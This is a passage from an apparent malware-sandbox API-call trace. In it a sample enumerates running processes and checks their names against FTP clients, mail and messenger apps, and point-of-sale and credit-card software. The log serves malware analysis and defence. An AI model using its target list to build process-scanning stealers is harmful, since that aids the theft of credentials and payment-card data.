CloseHandle (hObject=0x5a8) returned 1 [0091.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d8) returned 0x5a8 [0091.261] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.262] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="retention.exe") returned 0xd [0091.262] CloseHandle (hObject=0x5a8) returned 1 [0091.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5a8 [0091.262] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.263] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1380000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="villagesamefoo.exe") returned 0x12 [0091.264] CloseHandle (hObject=0x5a8) returned 1 [0091.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5a8 [0091.264] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.265] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x12e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="nonmedicines.exe") returned 0x10 [0091.265] CloseHandle (hObject=0x5a8) returned 1 [0091.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x600) returned 0x5a8 [0091.265] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.266] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x11b0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="snow_attachment.exe") returned 0x13 [0091.267] CloseHandle (hObject=0x5a8) returned 1 [0091.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x540) returned 0x5a8 [0091.267] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.268] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x360000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="checkingmxlikewise.exe") returned 0x16 [0091.268] CloseHandle (hObject=0x5a8) returned 1 [0091.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x5a8 [0091.268] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.269] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x2b0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ink.exe") returned 0x7 [0091.270] CloseHandle (hObject=0x5a8) returned 1 [0091.270] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x5a8 [0091.270] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.271] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xc90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ear.exe") returned 0x7 [0091.271] CloseHandle (hObject=0x5a8) returned 1 [0091.271] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x5a8 [0091.271] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.272] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x12c0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0091.273] CloseHandle (hObject=0x5a8) returned 1 [0091.273] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x5a8 [0091.273] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.274] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xc20000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0091.274] CloseHandle (hObject=0x5a8) returned 1 [0091.274] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x5a8 [0091.274] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.275] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xd40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0091.276] CloseHandle (hObject=0x5a8) returned 1 [0091.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5a8 [0091.276] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.277] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0091.277] CloseHandle (hObject=0x5a8) returned 1 [0091.277] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5a8 [0091.277] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.279] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xfc0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0091.279] CloseHandle (hObject=0x5a8) returned 1 [0091.279] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x620) returned 0x5a8 [0091.279] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.280] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xab0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0091.280] CloseHandle (hObject=0x5a8) returned 1 [0091.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5a8 [0091.280] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.281] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xbe0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0091.282] CloseHandle (hObject=0x5a8) returned 1 [0091.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5a8 [0091.282] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.283] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x9e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0091.283] CloseHandle (hObject=0x5a8) returned 1 [0091.283] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x5a8 [0091.283] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.284] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0091.284] CloseHandle (hObject=0x5a8) returned 1 [0091.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x5a8 [0091.284] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.286] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xf0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0091.286] CloseHandle (hObject=0x5a8) returned 1 [0091.286] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x5a8 [0091.286] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.287] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xf30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0091.287] CloseHandle (hObject=0x5a8) returned 1 [0091.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d4) returned 0x5a8 [0091.287] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.288] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xec0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0091.289] CloseHandle (hObject=0x5a8) returned 1 [0091.289] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x5a8 [0091.289] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.290] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0091.290] CloseHandle (hObject=0x5a8) returned 1 [0091.290] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5a8 [0091.290] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.291] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1310000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0091.292] CloseHandle (hObject=0x5a8) returned 1 [0091.292] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x5a8 [0091.292] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.293] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x8c0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0091.293] CloseHandle (hObject=0x5a8) returned 1 [0091.293] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x5a8 [0091.293] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.294] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xfd0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0091.295] CloseHandle (hObject=0x5a8) returned 1 [0091.295] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x5a8 [0091.295] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.296] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x9d0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0091.296] CloseHandle (hObject=0x5a8) returned 1 [0091.296] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x5a8 [0091.296] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.297] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1210000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0091.297] CloseHandle (hObject=0x5a8) returned 1 [0091.297] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x824) returned 0x5a8 [0091.297] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.299] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xa80000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0091.299] CloseHandle (hObject=0x5a8) returned 1 [0091.299] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x834) returned 0x5a8 [0091.299] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.300] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xda0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0091.300] CloseHandle (hObject=0x5a8) returned 1 [0091.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5a8 [0091.300] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.301] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x11d0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0091.302] CloseHandle (hObject=0x5a8) returned 1 [0091.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x5a8 [0091.302] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.303] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1220000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0091.303] CloseHandle (hObject=0x5a8) returned 1 [0091.303] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x864) returned 0x5a8 [0091.303] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.309] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xee0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0091.309] CloseHandle (hObject=0x5a8) returned 1 [0091.309] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x874) returned 0x5a8 [0091.309] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.310] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0091.310] CloseHandle (hObject=0x5a8) returned 1 [0091.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x5a8 [0091.311] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.312] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xb10000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0091.312] CloseHandle (hObject=0x5a8) returned 1 [0091.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x894) returned 0x5a8 [0091.312] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.313] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xb0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0091.313] CloseHandle (hObject=0x5a8) returned 1 [0091.313] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a4) returned 0x5a8 [0091.314] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.315] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe70000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0091.315] CloseHandle (hObject=0x5a8) returned 1 [0091.315] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x5a8 [0091.315] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.316] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xd40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0091.317] CloseHandle (hObject=0x5a8) returned 1 [0091.317] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x5a8 [0091.317] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.318] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1120000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0091.318] CloseHandle (hObject=0x5a8) returned 1 [0091.318] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x5a8 [0091.318] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.319] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xd50000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0091.319] CloseHandle (hObject=0x5a8) returned 1 [0091.320] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x5a8 [0091.320] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.321] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0091.321] CloseHandle (hObject=0x5a8) returned 1 [0091.321] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5a8 [0091.321] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.322] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x270000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0091.322] CloseHandle (hObject=0x5a8) returned 1 [0091.322] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5a8 [0091.322] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.324] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xaf0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0091.324] CloseHandle (hObject=0x5a8) returned 1 [0091.324] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5a8 [0091.324] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.325] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x100000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0091.325] CloseHandle (hObject=0x5a8) returned 1 [0091.325] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5a8 [0091.325] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.327] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xce0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0091.327] CloseHandle (hObject=0x5a8) returned 1 [0091.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5a8 [0091.327] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.328] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1f0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0091.328] CloseHandle (hObject=0x5a8) returned 1 [0091.328] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5a8 [0091.328] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.330] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x270000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0091.330] CloseHandle (hObject=0x5a8) returned 1 [0091.330] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5a8 [0091.330] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.331] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0091.331] CloseHandle (hObject=0x5a8) returned 1 [0091.331] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x5a8 [0091.331] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.333] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x2a0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0091.333] CloseHandle (hObject=0x5a8) returned 1 [0091.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x5a8 [0091.333] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.334] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x390000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0091.334] CloseHandle (hObject=0x5a8) returned 1 [0091.334] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x5a8 [0091.334] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.335] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x8e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0091.336] CloseHandle (hObject=0x5a8) returned 1 [0091.336] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x5a8 [0091.336] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.337] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe60000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0091.337] CloseHandle (hObject=0x5a8) returned 1 [0091.337] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x5a8 [0091.337] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.338] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xea0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0091.338] CloseHandle (hObject=0x5a8) returned 1 [0091.339] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5a8 [0091.339] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.340] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0091.340] CloseHandle (hObject=0x5a8) returned 1 [0091.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5a8 [0091.340] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.341] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xe30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="driven.exe") returned 0xa [0091.341] CloseHandle (hObject=0x5a8) returned 1 [0091.341] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5a8 [0091.341] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.342] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="bulgarian-competitions.exe") returned 0x1a [0091.343] CloseHandle (hObject=0x5a8) returned 1 [0091.343] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5a8 [0091.343] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0091.344] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xa40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="occurred folk.exe") returned 0x11 [0091.344] CloseHandle (hObject=0x5a8) returned 1 [0091.344] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, 